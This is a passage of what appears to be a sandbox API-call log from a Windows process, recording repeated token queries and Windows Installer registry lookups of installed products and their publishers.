"L\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xac\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\xb3\\x9b\\x18\\x00\"\r\\xc6r\\xd0\\x9b\\x18\\x00\\xc4\\x9b\\x18\\x00H\\x00\\x00\\x00\\xf4\\x9b\\x18\\x00\\xbc\\x9e\\x18\\x00" } ], "repeated": 0, "id": 828 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 829 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\2CD228B8B2E4A1742BC626947A22DD9B\\InstallProperties" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\2CD228B8B2E4A1742BC626947A22DD9B\\InstallProperties" } ], "repeated": 0, "id": 830 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegQueryValueExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Data", "value": "Python Software Foundation" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\2CD228B8B2E4A1742BC626947A22DD9B\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 831 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 832 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 833 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00J\"A\\x00\\x1c4\\x1cw" } ], "repeated": 0, "id": 834 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 835 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 836 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "Index", "value": "1" }, { "name": "Name", "value": "354CFBD9D3C92FE4DA44706066629B35" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\354CFBD9D3C92FE4DA44706066629B35" } ], "repeated": 0, "id": 837 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000384" } ], "repeated": 0, "id": 838 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x9a\\x85\\x02" } ], "repeated": 0, "id": 839 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 840 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 841 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 842 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 843 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\x00\\x00G\\x02\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 844 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 845 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\354CFBD9D3C92FE4DA44706066629B35" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\354CFBD9D3C92FE4DA44706066629B35" } ], "repeated": 0, "id": 846 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 847 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\xa4\\x9e\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 848 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 849 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\354CFBD9D3C92FE4DA44706066629B35" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\354CFBD9D3C92FE4DA44706066629B35" } ], "repeated": 0, "id": 850 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 851 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 852 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "L\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xac\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\xb3\\x9b\\x18\\x00\"\r\\xc6r\\xd0\\x9b\\x18\\x00\\xc4\\x9b\\x18\\x00H\\x00\\x00\\x00\\xf4\\x9b\\x18\\x00\\xbc\\x9e\\x18\\x00" } ], "repeated": 0, "id": 853 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 854 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\354CFBD9D3C92FE4DA44706066629B35\\InstallProperties" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\354CFBD9D3C92FE4DA44706066629B35\\InstallProperties" } ], "repeated": 0, "id": 855 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\354CFBD9D3C92FE4DA44706066629B35\\InstallProperties\\Publisher" } ], "repeated": 0, "id": 856 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 857 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 858 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00J\"A\\x00\\x1c4\\x1cw" } ], "repeated": 0, "id": 859 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 860 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 861 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "Index", "value": "2" }, { "name": "Name", "value": "6F44AD6D2BD8E734883088D7D16A3610" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\6F44AD6D2BD8E734883088D7D16A3610" } ], "repeated": 0, "id": 862 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000384" } ], "repeated": 0, "id": 863 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "0\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\x90\\xa7\\x18\\x00\\x00\\x00\\x00\\x00\\x97\\xa7\\x18\\x00\"\r\\xc6r\\xb4\\xa7\\x18\\x00\\xa8\\xa7\\x18\\x00H\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x9a\\x85\\x02" } ], "repeated": 0, "id": 864 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000384" } ], "repeated": 0, "id": 865 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 866 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x02411144", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 867 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 868 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\x00\\x00G\\x02\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 869 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 870 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\6F44AD6D2BD8E734883088D7D16A3610" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products\\6F44AD6D2BD8E734883088D7D16A3610" } ], "repeated": 0, "id": 871 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 872 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x18\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00x\\x95\\x18\\x00\\x00\\x00\\x00\\x00\\x7f\\x95\\x18\\x00\"\r\\xc6r\\x9c\\x95\\x18\\x00\\x90\\x95\\x18\\x00H\\x00\\x00\\x00\\xa4\\x9e\\x18\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 873 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 874 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\6F44AD6D2BD8E734883088D7D16A3610" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products\\6F44AD6D2BD8E734883088D7D16A3610" } ], "repeated": 0, "id": 875 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 876 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000380" } ], "repeated": 0, "id": 877 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "L\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xac\\x9b\\x18\\x00\\x00\\x00\\x00\\x00\\xb3\\x9b\\x18\\x00\"\r\\xc6r\\xd0\\x9b\\x18\\x00\\xc4\\x9b\\x18\\x00H\\x00\\x00\\x00\\xf4\\x9b\\x18\\x00\\xbc\\x9e\\x18\\x00" } ], "repeated": 0, "id": 878 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000380" } ], "repeated": 0, "id": 879 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\6F44AD6D2BD8E734883088D7D16A3610\\InstallProperties" }, { "name": "Handle", "value": "0x00000380" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\6F44AD6D2BD8E734883088D7D16A3610\\InstallProperties" } ], "repeated": 0, "id": 880 }, { "timestamp": "2025-02-27 23:34:18,019", "thread_id": "3892", "caller": "0x024111ed", "parentcaller": "0x0041224a", "category": "registry", "api": "RegQueryValueExA", "status": false, "return": "0x000000ea", "arguments": [ { "name": "Handle", "value": "0x00000380" }, { "name": "ValueName", "value": "Publisher" }, { "name": "Type", "value": "0x00000001", "pretty_value": "REG_SZ" }, { "name": "DataLength", "value": "27" }, { 